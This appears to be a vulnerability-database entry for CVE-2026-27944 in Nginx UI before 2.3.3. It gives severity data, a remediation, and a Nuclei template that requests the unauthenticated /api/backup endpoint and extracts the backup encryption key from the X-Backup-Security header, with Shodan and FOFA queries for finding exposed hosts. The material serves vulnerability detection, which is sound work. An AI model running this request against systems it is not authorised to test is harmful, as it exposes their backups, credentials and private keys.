Nginx UI < 2.3.3 - Information Disclosure
CVE-2026-27944
Verified
Description
Nginx UI < 2.3.3 contains an information disclosure vulnerability caused by unauthenticated access to /api/backup endpoint exposing encryption keys in X-Backup-Security header, letting unauthenticated attackers download and decrypt full system backups.
Severity
Critical
CVSS Score
9.8
Exploit Probability
7%
Affected Product
nginx-ui
Published Date
March 8, 2026
Template Author
omarkurt
CVE-2026-27944.yaml
id: CVE-2026-27944
info:
name: Nginx UI < 2.3.3 - Information Disclosure
author: omarkurt
severity: critical
description: |
Nginx UI < 2.3.3 contains an information disclosure vulnerability caused by unauthenticated access to /api/backup endpoint exposing encryption keys in X-Backup-Security header, letting unauthenticated attackers download and decrypt full system backups.
impact: |
Unauthenticated attackers can access and decrypt full system backups, exposing sensitive data including credentials and private keys.
remediation: |
Upgrade to version 2.3.3 or later.
reference:
- https://github.com/advisories/GHSA-g9w5-qffc-6762
- https://www.tenable.com/security/research/tra-2026-17
- https://vulnerabletarget.com/VT-2026-27944
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-27944
epss-score: 0.06782
epss-percentile: 0.91356
cwe-id: CWE-306
metadata:
verified: true
max-request: 1
vendor: 0xjacky
product: nginx-ui
shodan-query: http.title:"nginx ui"
fofa-query: title="nginx ui"
tags: cve,cve2026,nginx-ui,unauth,exposure,vkev
http:
- method: GET
path:
- "{{BaseURL}}/api/backup"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "X-Backup-Security"
- "application/zip"
condition: and
- type: word
part: header
words:
- "attachment; filename="
- type: status
status:
- 200
extractors:
- type: regex
part: header
group: 1
name: backup_security_header
regex:
- "X-Backup-Security: (.+)"
# digest: 4a0a00473045022100b193c568fa30f7c7e8fe4d8dab0a5ad9111018122e14b8dec74169d672e2bf240220257fd4fcca0b828bbf89616a8cc53695e1c0daec92026e89a727d14b350f158a:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-27944
CWE ID:
cwe-306
Remediation Steps
Upgrade to version 2.3.3 or later.